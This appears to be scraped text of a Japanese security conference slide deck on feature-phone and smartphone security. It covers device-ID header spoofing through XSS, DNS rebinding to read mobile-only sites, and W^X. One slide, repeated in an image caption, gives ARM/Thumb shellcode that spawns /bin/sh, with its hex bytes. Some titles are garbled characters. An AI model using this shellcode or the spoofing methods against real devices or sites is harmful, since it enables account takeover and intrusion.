![shellcode $ cat > test5.s .globl _main _main: add lr, pc, #1 bx lr .code 16 .thumb_func _thumb _thumb: sub r5, r5, r5 mov r6, sp sub sp, sp, #0x20 add r1, pc, #0x10 str r1, [r6] str r5, [r6, #4] mov r0, r1 mov r1, r6 mov r2, r5 mov r5, #0x3b mov r12,r5 swi 128 .ascii "/bin/sh" ^C $ gcc -mthumb test5.s –o test5 $ gdb test5 (gdb) x/44b main 0x2224: 0x01 0xe0 0x8f 0xe2 0x1e 0xff 0x2f 0xe1 0x222c: 0x6d 0x1b 0x6e 0x46 0x88 0xb0 0x04 0xa1 0x2234: 0x31 0x60 0x75 0x60 0x08 0x1c 0x31 0x1c 0x223c: 0x2a 0x1c 0x3b 0x25 0xac 0x46 0x80 0xdf 0x2244: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68](https://image.slidesharecdn.com/3-100531022146-phpapp01/85/-24-320.jpg)
爱甲健二
- 2. 大きく分けて 2種類のモバイル端末 スマートフォン BlackBerry, iPhone, Android, などなど 世界においての一般的なモバイル端末 携帯電話(ケイタイ) 日本独自のモバイル端末 90% 程度のシェアを持つ(らしい)
- 3. 大きく分けて 2種類のモバイル端末 スマートフォン BlackBerry, iPhone, Android, などなど 世界においての一般的なモバイル端末 携帯電話(ケイタイ) 日本独自のモバイル端末 90% 程度のシェアを持つ(らしい) PC と似たインターフェースを持つ モバイル端末(キーボードなど)
- 4. 大きく分けて 2種類のモバイル端末 スマートフォン BlackBerry, iPhone, Android, などなど 世界においての一般的なモバイル端末 携帯電話(ケイタイ) 日本独自のモバイル端末 90% 程度のシェアを持つ(らしい) 0-9#* などのボタンをベースとした 日本独自のインターフェースを持つ端末
- 5. 携帯と笔颁の违い
- 6. 個体識別情報(番号) 各携帯電話にユニークな番号 製造番号のようなもの? HTTP 通信時に HTTP 拡張ヘッダに追加 au の場合は ” X-UP-SUBNO” docomo の場合は “ USER_AGENT” i モード ID ( guid ) 英数字 7 桁 (大文字?小文字区別あり)
- 7. 個体識別情報の取得例 USER_AGENT に個体識別情報が格納 Web サーバ側で利用できる
- 9. フルブラウザ機能 携帯のフルブラウザ機能や iPhone 3G の場合 個体識別情報は無い iPhone 3G N-02A
- 10. 携帯電話とPCの判別 IPアドレスで判別 携帯電話が使用するIPアドレス範囲で判別 アドレス範囲は、各キャリアが随時公開 WEB SERVER MOBILE PHONE PC NG From: 11.22.33.44 From: 210.158.84.1 OK
- 11. 滨笔アドレス范囲(レンジ)
- 12. USER_AGENT変更ツール FireMobileSimulator 携帯端末ブラウザをシミュレートする Firefox のアドオン、携帯サイトの開発?テストツール
- 13. 携帯サイトの脆弱性
- 14. なりすましの可能性 個体識別情報を元に各ユーザーを識別するため、盗まれたら、他人への「なりすまし」が可能ではないか? 携帯 JavaScript と XSS の組み合わせによる 「かんたんログイン」なりすましの可能性 http://www.tokumaru.org/d/20090805.html 徳丸浩氏
- 15. なりすましのフロー target.com XSS脆弱性アリ XMLHttpRequest setRequestHeader
- 16. なりすましのフロー setRequestHeader により USER_AGENT を書き換え JavaScript から 偽の USER_AGENT で 通信する target.com XSS脆弱性アリ XMLHttpRequest setRequestHeader
- 17. なりすまし対策 2009 年内に Docomo が対策 JavaScript の一部機能( setRequestHeader など)を無効にした
- 18. 携帯サイトのHTMLソース閲覧 DNS Rebinding を使い、 JavaScript のクロスドメイン制限を回避し、携帯専用サイトの HTML ソースを JavaScript で受け取る方法 i モード専用サイトの html ソースの閲覧方法 http://mpw.jp/blog/2009/11/188.html mpw.jp 氏
- 19. 携帯サイトのHTML閲覧フロー IP: 1.2.3.4 myweb.com IP: 5.6.7.8 target.com DNS XMLHttpRequest 1.2.3.4 myweb.com myweb.com
- 20. 携帯サイトのHTML閲覧フロー IP: 5.6.7.8 myweb.com IP: 5.6.7.8 target.com DNS XMLHttpRequest myweb.com
- 21. 携帯サイトのHTML閲覧フロー IP: 5.6.7.8 myweb.com IP: 5.6.7.8 target.com DNS XMLHttpRequest myweb.com myweb.com 5.6.7.8
- 22. HTMLソース閲覧に対する対策 現時点では対策されていない ただ、 HTTP リクエストの Host メソッド値が、自身のホスト名( myweb.com )になるため、ターゲットのサーバが、バーチャルホストで運用されていると閲覧できない
- 23. iPhone の仕様 iPhone 3G OS: iPhone OS 2.0 CPU: ARM11 v6KZ Mem: 128MB 携帯電話と違い、比較的自由な開発環境 環境もオープンなため、様々なリサーチが行われている iPhone 3GS OS: iPhone OS 3.0 CPU: Cortex-A8 Mem: 256MB
- 24. shellcode $ cat > test5.s .globl _main _main: add lr, pc, #1 bx lr .code 16 .thumb_func _thumb _thumb: sub r5, r5, r5 mov r6, sp sub sp, sp, #0x20 add r1, pc, #0x10 str r1, [r6] str r5, [r6, #4] mov r0, r1 mov r1, r6 mov r2, r5 mov r5, #0x3b mov r12,r5 swi 128 .ascii "/bin/sh" ^C $ gcc -mthumb test5.s –o test5 $ gdb test5 (gdb) x/44b main 0x2224: 0x01 0xe0 0x8f 0xe2 0x1e 0xff 0x2f 0xe1 0x222c: 0x6d 0x1b 0x6e 0x46 0x88 0xb0 0x04 0xa1 0x2234: 0x31 0x60 0x75 0x60 0x08 0x1c 0x31 0x1c 0x223c: 0x2a 0x1c 0x3b 0x25 0xac 0x46 0x80 0xdf 0x2244: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68
- 25. W^X 書き込み (W) と実行 (X) を天秤にする仕様 書き込みできるメモリ空間は実行できず、実行できるメモリ空間は書き込みできない OpenBSD が採用 mprotect で切り替え可 X W execute only
- 26. スマートフォンのセキュリティ 動いているサービスによって様々 条件が揃えばRemoteからの乗っ取りも可能 Serverアプリなども公開されているため PCに近いシステムであるため、携帯電話に比べて解析され易い
- 27. まとめ 携帯電話は Web 系のセキュリティが主流 携帯ブラウザの Ajax 、 JavaScript 関連 スマートフォンは比較的 OS やハードウェアに近い部分のセキュリティがメイン iPhone の jailbreak など